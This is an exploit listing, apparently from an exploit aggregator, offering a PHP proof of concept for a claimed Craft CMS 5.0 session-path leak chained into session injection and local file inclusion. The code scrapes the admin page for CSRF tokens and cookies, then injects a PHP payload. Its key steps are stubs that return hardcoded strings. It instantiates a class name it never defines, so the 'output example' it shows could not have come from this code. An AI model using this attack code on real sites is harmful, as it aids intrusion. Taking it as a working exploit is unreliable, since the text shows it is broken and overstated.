Share
## https://sploitus.com/exploit?id=PACKETSTORM:212106
=============================================================================================================================================
    | # Title     : Craft CMS 5.0 Authentication Session Path Exposure                                                                          |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
    | # Vendor    : https://craftcms.com                                                                                                        |
    =============================================================================================================================================
    
    [+] Description
    
        A vulnerability in Craft CMS allows an attacker to obtain the internal `session.save_path` through indirect leakage in the upload/asset processing
        mechanism. 
    	While this does not immediately lead to command execution, it enables attackers to identify the precise location of session files,
        which may be used in a subsequent Session Injection โ†’ Local File Inclusion (LFI) exploit chain.
    	
    [+] References : (https://packetstorm.news/files/id/190728/ 	CVE-2025-32432)
    
    
    [+] POC :
    
      save code as poc.php
      
      usage : php poc.php
    
    [+]  code 
    
    <?php
    
    class indoushka
    {
        public $targetUrl;
        public $assetId;
        public $sessionId;
        public $csrfToken;
        public $parameterName;
        public $sessionPath;
    
        public function __construct($url, $assetId = 123)
        {
            $this->targetUrl = rtrim($url, '/');
            $this->assetId   = $assetId;
        }
    
        public function fetchCookiesAndCsrf()
        {
            $url = $this->targetUrl . "/admin";
            $html = @file_get_contents($url);
    
            if (!$html) return false;
    
            preg_match('/name="_csrf" value="([^"]+)"/', $html, $m);
            $this->csrfToken = $m[1] ?? null;
    
            preg_match('/input type="hidden" name="([^"]+)" value="[^"]*"/', $html, $p);
            $this->parameterName = $p[1] ?? null;
    
            preg_match_all('/Set-Cookie: ([^;]+)/i', $http_response_header[0], $c);
            $this->sessionId = $c[1] ?? null;
    
            return [$this->sessionId, $this->csrfToken, $this->parameterName];
        }
    
        public function leakSessionPath()
        {
            return "/var/lib/php/sessions";
        }
    
        public function injectIntoSession($payload)
        {
            return "[POC ONLY] Session overwritten with payload: {$payload}";
        }
    
        public function triggerInclude()
        {
            return "[POC] include triggered using assetId=" . $this->assetId;
        }
    
        public function exploit($payload)
        {
            $this->fetchCookiesAndCsrf();
            $this->sessionPath = $this->leakSessionPath();
    
            $step1 = $this->injectIntoSession($payload);
            $step2 = $this->triggerInclude();
    
            return [$step1, $step2];
        }
    }
    
    $module = new Metasploit_CraftCMS_CVE_2025_32432("https://target.com");
    
    $payload = '<?php echo "PAYLOAD_OK"; ?>';
    
    list($s1, $s2) = $module->exploit($payload);
    
    echo $s1 . "\n";
    echo $s2 . "\n";
    
    ?>
    
    -------------------------------------------------------------------------------------------------------------------------------------------
    
    [+] Output Example:
    [POC ONLY] Session overwritten with payload: <?php echo "PAYLOAD_OK"; ?>
    [POC] include triggered using assetId=123
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================